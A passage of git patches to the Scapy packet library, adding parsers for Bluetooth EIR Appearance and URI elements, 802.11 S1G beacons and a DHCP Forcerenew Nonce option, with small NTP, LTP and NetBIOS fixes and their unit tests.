'Light Fixtures', + 0x017: 'Fan', + 0x018: 'HVAC', + 0x019: 'Air Conditioning', + 0x01A: 'Humidifier', + 0x01B: 'Heating', + 0x01C: 'Access Control', + 0x01D: 'Motorized Device', + 0x01E: 'Power Device', + 0x01F: 'Light Source', + 0x020: 'Window Covering', + 0x021: 'Audio Sink', + 0x022: 'Audio Source', + 0x023: 'Motorized Vehicle', + 0x024: 'Domestic Appliance', + 0x025: 'Wearable Audio Device', + 0x026: 'Aircraft', + 0x027: 'AV Equipment', + 0x028: 'Display Equipment', + 0x029: 'Hearing aid', + 0x02A: 'Gaming', + 0x02B: 'Signage', + 0x031: 'Pulse Oximeter', + 0x032: 'Weight Scale', + 0x033: 'Personal Mobility Device', + 0x034: 'Continuous Glucose Monitor', + 0x035: 'Insulin Pump', + 0x036: 'Medication Delivery', + 0x037: 'Spirometer', + 0x051: 'Outdoor Sports Activity' + }), + XBitField('subcategory', 0, 6, end_tot_size=-2) + ] + + @property + def appearance(self): + return (self.category << 6) + self.subcategory + + class EIR_ServiceData32BitUUID(EIR_Element): name = 'EIR Service Data - 32-bit UUID' fields_desc = [ @@ -2383,6 +2448,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_ServiceSolicitation128BitUUID, type=0x15) bind_layers(EIR_Hdr, EIR_ServiceData16BitUUID, type=0x16) bind_layers(EIR_Hdr, EIR_PublicTargetAddress, type=0x17) +bind_layers(EIR_Hdr, EIR_Appearance, type=0x19) bind_layers(EIR_Hdr, EIR_AdvertisingInterval, type=0x1a) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 763dcf032cb..ecaf463d11a 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -481,6 +481,13 @@ p = HCI_Event_Hdr(hex_bytes('3e23020100002e4961121110170201060f0954656c655361742 assert EIR_AdvertisingInterval in p assert p[EIR_AdvertisingInterval].advertising_interval == 400 += Parse EIR_Appearance +p = BTLE(hex_bytes("d6be898e201660d4d3cebffb0201050319420c0303e7fe040948393850c27c")) +assert EIR_Appearance in p +assert p[EIR_Appearance].appearance == 0x0c42 +assert p[EIR_Appearance].category == 0x31 #'Pulse Oximeter' +assert p[EIR_Appearance].subcategory == 0x02 # Wrist Worn Pulse Oximeter + = Parse EIR_ServiceData32BitUUID p = HCI_Hdr(hex_bytes('042fff01c47c80894df801000c0128a269a30c4a125d13f30196894df80c012820f61a1a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')) From cb4a95b2a941828dfe0465e8aadbbec9821cafa8 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 25 Dec 2024 09:09:02 +0100 Subject: [PATCH 1404/1632] Bluetooth: Add EIR URI (#4617) * bluetooth: Add EIR URI * bluetooth: Rename EIR_Appearance --- scapy/layers/bluetooth.py | 202 +++++++++++++++++++++++++++++++- test/scapy/layers/bluetooth.uts | 8 ++ 2 files changed, 209 insertions(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 887ad7017bf..60e7b37f5ee 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1271,7 +1271,7 @@ class EIR_AdvertisingInterval(EIR_Element): class EIR_Appearance(EIR_Element): - name = "EIR_Appearance2" + name = "EIR_Appearance" fields_desc = [ BitEnumField('category', 0, 10, tot_size=-2, enum={ 0x000: 'Unknown', @@ -1359,6 +1359,205 @@ def extract_padding(self, s): return s[:plen], s[plen:] +class EIR_URI(EIR_Element): + name = 'EIR URI' + fields_desc = [ + ByteEnumField('scheme', 0, { + 0x01: '', + 0x02: 'aaa:', + 0x03: 'aaas:', + 0x04: 'about:', + 0x05: 'acap:', + 0x06: 'acct:', + 0x07: 'cap:', + 0x08: 'cid:', + 0x09: 'coap:', + 0x0A: 'coaps:', + 0x0B: 'crid:', + 0x0C: 'data:', + 0x0D: 'dav:', + 0x0E: 'dict:', + 0x0F: 'dns:', + 0x10: 'file:', + 0x11: 'ftp:', + 0x12: 'geo:', + 0x13: 'go:', + 0x14: 'gopher:', + 0x15: 'h323:', + 0x16: 'http:', + 0x17: 'https:', + 0x18: 'iax:', + 0x19: 'icap:', + 0x1A: 'im:', + 0x1B: 'imap:', + 0x1C: 'info:', + 0x1D: 'ipp:', + 0x1E: 'ipps:', + 0x1F: 'iris:', + 0x20: 'iris.beep:', + 0x21: 'iris.xpc:', + 0x22: 'iris.xpcs:', + 0x23: 'iris.lwz:', + 0x24: 'jabber:', + 0x25: 'ldap:', + 0x26: 'mailto:', + 0x27: 'mid:', + 0x28: 'msrp:', + 0x29: 'msrps:', + 0x2A: 'mtqp:', + 0x2B: 'mupdate:', + 0x2C: 'news:', + 0x2D: 'nfs:', + 0x2E: 'ni:', + 0x2F: 'nih:', + 0x30: 'nntp:', + 0x31: 'opaquelocktoken:', + 0x32: 'pop:', + 0x33: 'pres:', + 0x34: 'reload:', + 0x35: 'rtsp:', + 0x36: 'rtsps:', + 0x37: 'rtspu:', + 0x38: 'service:', + 0x39: 'session:', + 0x3A: 'shttp:', + 0x3B: 'sieve:', + 0x3C: 'sip:', + 0x3D: 'sips:', + 0x3E: 'sms:', + 0x3F: 'snmp:', + 0x40: 'soap.beep:', + 0x41: 'soap.beeps:', + 0x42: 'stun:', + 0x43: 'stuns:', + 0x44: 'tag:', + 0x45: 'tel:', + 0x46: 'telnet:', + 0x47: 'tftp:', + 0x48: 'thismessage:', + 0x49: 'tn3270:', + 0x4A: 'tip:', + 0x4B: 'turn:', + 0x4C: 'turns:', + 0x4D: 'tv:', + 0x4E: 'urn:', + 0x4F: 'vemmi:', + 0x50: 'ws:', + 0x51: 'wss:', + 0x52: 'xcon:', + 0x53: 'xconuserid:', + 0x54: 'xmlrpc.beep:', + 0x55: 'xmlrpc.beeps:', + 0x56: 'xmpp:', + 0x57: 'z39.50r:', + 0x58: 'z39.50s:', + 0x59: 'acr:', + 0x5A: 'adiumxtra:', + 0x5B: 'afp:', + 0x5C: 'afs:', + 0x5D: 'aim:', + 0x5E: 'apt:', + 0x5F: 'attachment:', + 0x60: 'aw:', + 0x61: 'barion:', + 0x62: 'beshare:', + 0x63: 'bitcoin:', + 0x64: 'bolo:', + 0x65: 'callto:', + 0x66: 'chrome:', + 0x67: 'chromeextension:', + 0x68: 'comeventbriteattendee:', + 0x69: 'content:', + 0x6A: 'cvs:', + 0x6B: 'dlnaplaysingle:', + 0x6C: 'dlnaplaycontainer:', + 0x6D: 'dtn:', + 0x6E: 'dvb:', + 0x6F: 'ed2k:', + 0x70: 'facetime:', + 0x71: 'feed:', + 0x72: 'feedready:', + 0x73: 'finger:', + 0x74: 'fish:', + 0x75: 'gg:', + 0x76: 'git:', + 0x77: 'gizmoproject:', + 0x78: 'gtalk:', + 0x79: 'ham:', + 0x7A: 'hcp:', + 0x7B: 'icon:', + 0x7C: 'ipn:', + 0x7D: 'irc:', + 0x7E: 'irc6:', + 0x7F: 'ircs:', + 0x80: 'itms:', + 0x81: 'jar:', + 0x82: 'jms:', + 0x83: 'keyparc:', + 0x84: 'lastfm:', + 0x85: 'ldaps:', + 0x86: 'magnet:', + 0x87: 'maps:', + 0x88: 'market:', + 0x89: 'message:', + 0x8A: 'mms:', + 0x8B: 'mshelp:', + 0x8C: 'mssettingspower:', + 0x8D: 'msnim:', + 0x8E: 'mumble:', + 0x8F: 'mvn:', + 0x90: 'notes:', + 0x91: 'oid:', + 0x92: 'palm:', + 0x93: 'paparazzi:', + 0x94: 'pkcs11:', + 0x95: 'platform:', + 0x96: 'proxy:', + 0x97: 'psyc:', + 0x98: 'query:', + 0x99: 'res:', + 0x9A: 'resource:', + 0x9B: 'rmi:', + 0x9C: 'rsync:', + 0x9D: 'rtmfp:', + 0x9E: 'rtmp:', + 0x9F: 'secondlife:', + 0xA0: 'sftp:', + 0xA1: 'sgn:', + 0xA2: 'skype:', + 0xA3: 'smb:', + 0xA4: 'smtp:', + 0xA5: 'soldat:', + 0xA6: 'spotify:', + 0xA7: 'ssh:', + 0xA8: 'steam:', + 0xA9: 'submit:', + 0xAA: 'svn:', + 0xAB: 'teamspeak:', + 0xAC: 'teliaeid:', + 0xAD: 'things:', + 0xAE: 'udp:', + 0xAF: 'unreal:', + 0xB0: 'ut2004:', + 0xB1: 'ventrilo:', + 0xB2: 'viewsource:', + 0xB3: 'webcal:', + 0xB4: 'wtai:', + 0xB5: 'wyciwyg:', + 0xB6: 'xfire:', + 0xB7: 'xri:', + 0xB8: 'ymsgr:', + 0xB9: 'example:', + 0xBA: 'mssettingscloudstorage:' + }), + StrLenField('uri_hier_part', None, length_from=EIR_Element.length_from) + ] + + @property + def uri(self): + return EIR_URI.scheme.i2s[self.scheme] + self.uri_hier_part.decode('utf-8') + + class HCI_Command_Hdr(Packet): name = "HCI Command header" fields_desc = [XBitField("ogf", 0, 6, tot_size=-2), @@ -2452,6 +2651,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_AdvertisingInterval, type=0x1a) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) +bind_layers(EIR_Hdr, EIR_URI, type=0x24) bind_layers(EIR_Hdr, EIR_Manufacturer_Specific_Data, type=0xff) bind_layers(EIR_Hdr, EIR_Raw) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index ecaf463d11a..6c719621d9d 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -494,6 +494,14 @@ p = HCI_Hdr(hex_bytes('042fff01c47c80894df801000c0128a269a30c4a125d13f30196894df assert EIR_ServiceData32BitUUID in p assert p[EIR_ServiceData32BitUUID].svc_uuid == 0x001a1af6 += Parse EIR_URI + +p = HCI_Event_Hdr(hex_bytes('3e2902010301f3c1dad728031d1c24172f2f6669726d776172652e73696c766169722e636f6d2f6f6f62ac')) +assert EIR_URI in p +assert p[EIR_URI].scheme == 0x17 +assert p[EIR_URI].uri_hier_part == b'//firmware.silvair.com/oob' +assert p[EIR_URI].uri == 'https://firmware.silvair.com/oob' + = Parse EIR_Flags, EIR_CompleteList16BitServiceUUIDs, EIR_CompleteLocalName and EIR_TX_Power_Level ad_report_raw_data = \ From 42bc8ea479692ca4f05bf2fd024c04ab268fb35d Mon Sep 17 00:00:00 2001 From: Satveer Brar <63824753+satveerbrar@users.noreply.github.com> Date: Sat, 28 Dec 2024 07:21:46 -0500 Subject: [PATCH 1405/1632] Removed unnecessary Cancel ACK's field (#4613) --- scapy/contrib/ltp.py | 7 ------- 1 file changed, 7 deletions(-) diff --git a/scapy/contrib/ltp.py b/scapy/contrib/ltp.py index d8441b0ff4f..bf2e903ab52 100755 --- a/scapy/contrib/ltp.py +++ b/scapy/contrib/ltp.py @@ -171,13 +171,6 @@ class LTP(Packet): 15, _ltp_cancel_reasons), lambda x: x.flags == 14), # - # Cancellation Acknowldgements - # - ConditionalField(SDNV2("CancelAckToBlockSender", 0), - lambda x: x.flags == 13), - ConditionalField(SDNV2("CancelAckToBlockReceiver", 0), - lambda x: x.flags == 15), - # # Finally, trailing extensions # PacketListField("TrailerExtensions", [], LTPex, count_from=lambda x: x.TrailerExtensionCount) # noqa: E501 From ce816496e0080798c790dd0785fb02b906705729 Mon Sep 17 00:00:00 2001 From: Satveer Brar <63824753+satveerbrar@users.noreply.github.com> Date: Sat, 28 Dec 2024 07:35:28 -0500 Subject: [PATCH 1406/1632] Fix enum mismatch by changing keys to bytes in dict (#4609) --- scapy/layers/ntp.py | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 51eb4b1002b..c3d2cc111a9 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -143,25 +143,25 @@ def i2m(self, pkt, val): # RFC 5905 / Section 7.3 _reference_identifiers = { - "GOES": "Geosynchronous Orbit Environment Satellite", - "GPS ": "Global Position System", - "GAL ": "Galileo Positioning System", - "PPS ": "Generic pulse-per-second", - "IRIG": "Inter-Range Instrumentation Group", - "WWVB": "LF Radio WWVB Ft. Collins, CO 60 kHz", - "DCF ": "LF Radio DCF77 Mainflingen, DE 77.5 kHz", - "HBG ": "LF Radio HBG Prangins, HB 75 kHz", - "MSF ": "LF Radio MSF Anthorn, UK 60 kHz", - "JJY ": "LF Radio JJY Fukushima, JP 40 kHz, Saga, JP 60 kHz", - "LORC": "MF Radio LORAN C station, 100 kHz", - "TDF ": "MF Radio Allouis, FR 162 kHz", - "CHU ": "HF Radio CHU Ottawa, Ontario", - "WWV ": "HF Radio WWV Ft. Collins, CO", - "WWVH": "HF Radio WWVH Kauai, HI", - "NIST": "NIST telephone modem", - "ACTS": "NIST telephone modem", - "USNO": "USNO telephone modem", - "PTB ": "European telephone modem", + b"GOES": "Geosynchronous Orbit Environment Satellite", + b"GPS ": "Global Position System", + b"GAL ": "Galileo Positioning System", + b"PPS ": "Generic pulse-per-second", + b"IRIG": "Inter-Range Instrumentation Group", + b"WWVB": "LF Radio WWVB Ft. Collins, CO 60 kHz", + b"DCF ": "LF Radio DCF77 Mainflingen, DE 77.5 kHz", + b"HBG ": "LF Radio HBG Prangins, HB 75 kHz", + b"MSF ": "LF Radio MSF Anthorn, UK 60 kHz", + b"JJY ": "LF Radio JJY Fukushima, JP 40 kHz, Saga, JP 60 kHz", + b"LORC": "MF Radio LORAN C station, 100 kHz", + b"TDF ": "MF Radio Allouis, FR 162 kHz", + b"CHU ": "HF Radio CHU Ottawa, Ontario", + b"WWV ": "HF Radio WWV Ft. Collins, CO", + b"WWVH": "HF Radio WWVH Kauai, HI", + b"NIST": "NIST telephone modem", + b"ACTS": "NIST telephone modem", + b"USNO": "USNO telephone modem", + b"PTB ": "European telephone modem", } From 706568b21be28d4739d6d9fceb380bdf0bdfff22 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 28 Dec 2024 13:38:34 +0100 Subject: [PATCH 1407/1632] Check the instance of ADDR_ENTRY[0] (#4565) * Check the instance of ADDR_ENTRY[0] * Update test/scapy/layers/netbios.uts Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/netbios.py | 3 ++- test/scapy/layers/netbios.uts | 8 ++++++++ 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index c41e532330c..0995d67d771 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -185,7 +185,8 @@ class NBNSQueryResponse(Packet): ] def mysummary(self): - if not self.ADDR_ENTRY: + if not self.ADDR_ENTRY or \ + not isinstance(self.ADDR_ENTRY[0], NBNS_ADD_ENTRY): return "NBNSQueryResponse" return "NBNSQueryResponse '\\\\%s' is at %s" % ( self.RR_NAME.decode(errors="backslashreplace"), diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index b5d6e8d4f46..eaff95decfe 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -99,3 +99,11 @@ assert pkt[NBNSWackResponse].RR_NAME == b'SARAH' z = raw(TCP()/NBTSession()) assert z == b'\x00\x8b\x00\x8b\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00\x00\x00\x00\x00' assert NBTSession in TCP(z) + += OSS-Fuzz Findings + +# Note: the packet is corrupted +with no_debug_dissector(): + raw_packet = b'E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x00\x00\x00' + packet = NBNSQueryResponse(raw_packet) + assert packet.summary() == "NBNSQueryResponse" From 13465222cc36c8e6d6ebf61451a192df9e12bd8b Mon Sep 17 00:00:00 2001 From: rkinder2023 <138834119+rkinder2023@users.noreply.github.com> Date: Sat, 28 Dec 2024 23:43:58 +1100 Subject: [PATCH 1408/1632] Add support for S1G beacon to the dot11 layer. (#2) (#4458) * Add support for S1G beacon to the dot11 layer. (#2) - Includes unit test parsing and confirming an S1G beacon - Includes support for the new Frame Control format for type=3, subtype=1 (S1G beacon) - Includes changes to support addressing used in S1G beacon. All dot11 unit tests pass with this change. * More unit test changes to trigger workflows (#3) * Add support for S1G beacon to the dot11 layer. - Includes unit test parsing and confirming an S1G beacon - Includes support for the new Frame Control format for type=3, subtype=1 (S1G beacon) - Includes changes to support addressing used in S1G beacon. All dot11 unit tests pass with this change. * Update S1G beacon parsing based on code review. (#4) * Fix review comments from @p-l-: - Use set for 'type in' checks for extension frame type 3, subtype 1 (S1G beacon). * Update to FCfield to split into three parts for type 3, subtype 1 (S1G beacon frame control field). This allows use of BitField for the 'bw', and FlagsField for the remaining bits. --- scapy/layers/dot11.py | 30 ++++++++++++++++++++++++++---- test/scapy/layers/dot11.uts | 18 ++++++++++++++++++ 2 files changed, 44 insertions(+), 4 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index d27a5fcbc3f..7dd563885b6 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -691,7 +691,7 @@ def i2repr(self, pkt, val): return s -# 802.11-2016 9.2.4.1.1 +# 802.11-2020 9.2.4.1.1 class Dot11(Packet): name = "802.11" fields_desc = [ @@ -710,17 +710,31 @@ class Dot11(Packet): FlagsField("FCfield", 0, 4, ["pw-mgt", "MD", "protected", "order"]), lambda pkt: (pkt.type, pkt.subtype) == (1, 6) + ), + ( + FlagsField("FCfield", 0, 2, + ["security", "AP_PM"]), + lambda pkt: (pkt.type, pkt.subtype) == (3, 1) ) ], FlagsField("FCfield", 0, 8, ["to-DS", "from-DS", "MF", "retry", "pw-mgt", "MD", "protected", "order"]) ), + ConditionalField( + BitField("FCfield_bw", 0, 3), + lambda pkt: (pkt.type, pkt.subtype) == (3, 1) + ), + ConditionalField( + FlagsField("FCfield2", 0, 3, + ["next_tbtt", "comp_ssid", "ano"]), + lambda pkt: (pkt.type, pkt.subtype) == (3, 1) + ), ShortField("ID", 0), _Dot11MacField("addr1", ETHER_ANY, 1), ConditionalField( _Dot11MacField("addr2", ETHER_ANY, 2), - lambda pkt: (pkt.type != 1 or + lambda pkt: (pkt.type not in {1, 3} or pkt.subtype in [0x4, 0x5, 0x6, 0x8, 0x9, 0xa, 0xb, 0xe, 0xf]), ), ConditionalField( @@ -728,7 +742,7 @@ class Dot11(Packet): lambda pkt: (pkt.type in [0, 2] or ((pkt.type, pkt.subtype) == (1, 6) and pkt.cfe == 6)), ), - ConditionalField(LEShortField("SC", 0), lambda pkt: pkt.type != 1), + ConditionalField(LEShortField("SC", 0), lambda pkt: pkt.type not in {1, 3}), ConditionalField( _Dot11MacField("addr4", ETHER_ANY, 4), lambda pkt: (pkt.type == 2 and @@ -744,7 +758,7 @@ def guess_payload_class(self, payload): if self.type == 0x02 and ( 0x08 <= self.subtype <= 0xF and self.subtype != 0xD): return Dot11QoS - elif self.FCfield.protected: + elif hasattr(self.FCfield, "protected") and self.FCfield.protected: # When a frame is handled by encryption, the Protected Frame bit # (previously called WEP bit) is set to 1, and the Frame Body # begins with the appropriate cryptographic header. @@ -1840,6 +1854,12 @@ class Dot11CSA(Packet): ] +class Dot11S1GBeacon(_Dot11EltUtils): + name = "802.11 S1G Beacon" + fields_desc = [LEIntField("timestamp", 0), + ByteField("change_seq", 0)] + + ################### # 802.11 Security # ################### @@ -1989,6 +2009,7 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(Dot11, Dot11ProbeReq, subtype=4, type=0) bind_layers(Dot11, Dot11ProbeResp, subtype=5, type=0) bind_layers(Dot11, Dot11Beacon, subtype=8, type=0) +bind_layers(Dot11, Dot11S1GBeacon, subtype=1, type=3) bind_layers(Dot11, Dot11ATIM, subtype=9, type=0) bind_layers(Dot11, Dot11Disas, subtype=10, type=0) bind_layers(Dot11, Dot11Auth, subtype=11, type=0) @@ -1996,6 +2017,7 @@ class Dot11CCMP(Dot11Encrypted): bind_layers(Dot11, Dot11Action, subtype=13, type=0) bind_layers(Dot11, Dot11Ack, subtype=13, type=1) bind_layers(Dot11Beacon, Dot11Elt,) +bind_layers(Dot11S1GBeacon, Dot11Elt,) bind_layers(Dot11AssoReq, Dot11Elt,) bind_layers(Dot11AssoResp, Dot11Elt,) bind_layers(Dot11ReassoReq, Dot11Elt,) diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 06a45e01a29..b1c81931724 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -778,3 +778,21 @@ assert pkt[Dot11Elt::{"ID": 74}].len == 14 pkt = Dot11EltCSA(b'%\x03\x01\x0b\x05') assert pkt[Dot11Elt::{"ID": 37}].len == 3 + += Dot11S1GBeacon + +pkt=Dot11(b"\x1c\x18\x00\x00,/u\x1c\x103hq\xf8\x00\x00\xd5\x08\x01\x00d\x00\x00\x00\x00\x00\x05\x02\x00\x01\xd9\x0f\x9e\x00@\x18\x80\x0c\x00\x02@\x00\xfe\x00\xfc\x01\x00\xe8\x06\x06\x18&(\xc4\xcc\xd6\x02d\x00\x00\nWiFiDiving\xdd\x18\x00P\xf2\x02\x01\x01\x01\x00\x03\xa4\xd5\x01'\xa4\xd5\x01BC\xd5\x01b2\xd5\x01") +assert pkt[Dot11].type == 3 +assert pkt[Dot11].subtype == 1 +assert pkt[Dot11].addr1 == '2c:2f:75:1c:10:33' +assert pkt[Dot11S1GBeacon].timestamp == 16281960 +assert pkt[Dot11Elt::{"ID": 0}].info == b"WiFiDiving" +assert pkt[Dot11Elt::{"ID": 214}].len == 2 +assert pkt[Dot11Elt::{"ID": 217}].len == 15 +assert pkt[Dot11Elt::{"ID": 232}].len == 6 +assert pkt[Dot11].FCfield_bw == 3 +assert pkt[Dot11].FCfield2.next_tbtt == False +assert pkt[Dot11].FCfield2.comp_ssid == False +assert pkt[Dot11].FCfield2.ano == False +assert pkt[Dot11].FCfield.security == False +assert pkt[Dot11].FCfield.AP_PM == False From a28d74a0cbd37f2926f364ef0a78d4516ba92317 Mon Sep 17 00:00:00 2001 From: Satveer Brar <63824753+satveerbrar@users.noreply.github.com> Date: Thu, 2 Jan 2025 13:42:40 -0500 Subject: [PATCH 1409/1632] Add .idea to ignore Jetbrains IDE files (#4623) --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index fc08904957f..97e2a8a8be6 100644 --- a/.gitignore +++ b/.gitignore @@ -16,3 +16,4 @@ coverage.xml __pycache__/ doc/scapy/_build doc/scapy/api +.idea \ No newline at end of file From c424205090fe034d27a8eddf2bc40cb17e105148 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 4 Jan 2025 13:29:11 +0300 Subject: [PATCH 1410/1632] DHCPv4: add the Forcerenew Nonce Protocol Capability Option (#4630) https://www.rfc-editor.org/rfc/rfc6704.html#section-3.1.1 ``` The FORCERENEW_NONCE_CAPABLE option contains code 145, length n, and a sequence of algorithms the client supports: Code Len Algorithms +-----+-----+----+----+----+ | 145 | n | A1 | A2 | A3 | .... +-----+-----+----+----+----+ ``` The `_DHCPParamReqFieldListField` class was renamed because the format of the Parameter Request List option is the same in the sense that it's just a sequence of bytes so it can be reused to implement the Forcerenew Nonce Protocol Capability option as well to make fuzz() work. The patch was also tested with Wireshark: ``` >>> tdecode(Ether()/IP()/UDP()/BOOTP()/DHCP(options=[('forcerenew_nonce_capable', ['HMAC-MD5', 2, 3])])) ... Option: (145) Forcerenew Nonce Capable Length: 3 Algorithm: HMAC-MD5 (1) Algorithm: Unknown (2) Algorithm: Unknown (3) ``` --- scapy/layers/dhcp.py | 11 +++++++---- test/scapy/layers/dhcp.uts | 6 ++++-- 2 files changed, 11 insertions(+), 6 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index aeedf8e35c2..031fe34decc 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -115,12 +115,12 @@ def answers(self, other): return self.xid == other.xid -class _DHCPParamReqFieldListField(FieldListField): +class _DHCPByteFieldListField(FieldListField): def randval(self): - class _RandReqFieldList(RandField): + class _RandByteFieldList(RandField): def _fix(self): return [RandByte()] * int(RandByte()) - return _RandReqFieldList() + return _RandByteFieldList() class RandClasslessStaticRoutesField(RandField): @@ -277,7 +277,7 @@ def randval(self): 52: ByteField("dhcp-option-overload", 100), 53: ByteEnumField("message-type", 1, DHCPTypes), 54: IPField("server_id", "0.0.0.0"), - 55: _DHCPParamReqFieldListField( + 55: _DHCPByteFieldListField( "param_req_list", [], ByteField("opcode", 0)), 56: "error_message", @@ -337,6 +337,9 @@ def randval(self): 137: "v4-lost", 138: IPField("capwap-ac-v4", "0.0.0.0"), 141: "sip_ua_service_domains", + 145: _DHCPByteFieldListField( + "forcerenew_nonce_capable", [], + ByteEnumField("algorithm", 1, {1: "HMAC-MD5"})), 146: "rdnss-selection", 150: IPField("tftp_server_address", "0.0.0.0"), 159: "v4-portparams", diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 3793d2dc4a4..42758ed2314 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -47,8 +47,8 @@ assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\ s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), ("captive-portal", "https://example.com"), ("ipv6-only-preferred", 0xffffffff), "end"])) assert s4 == b"E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01)L\xd7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\x6c\x04\xff\xff\xff\xff\xff" -s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), ("rapid_commit", b""), "end"])) -assert s5 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0e\xaa\xfd\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 